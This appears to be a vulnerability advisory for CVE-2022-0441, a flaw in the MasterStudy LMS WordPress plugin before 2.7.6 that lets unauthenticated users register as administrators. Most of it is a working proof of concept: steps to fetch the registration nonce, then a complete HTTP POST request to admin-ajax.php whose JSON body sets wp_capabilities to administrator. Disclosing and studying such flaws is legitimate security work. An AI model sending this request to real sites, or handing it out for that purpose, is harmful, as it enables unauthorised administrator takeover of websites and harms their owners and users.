MasterStudy LMS < 2.7.6 – Unauthenticated Admin Account Creation | CVE 2022-0441

Description

The plugin does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin

Proof of Concept

The nonce value of the stm_lms_register request must be retrieved from the ajax page. for this you should check the home page

POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
https://www.youtube.com/watch?v=SI_O6CHXMZk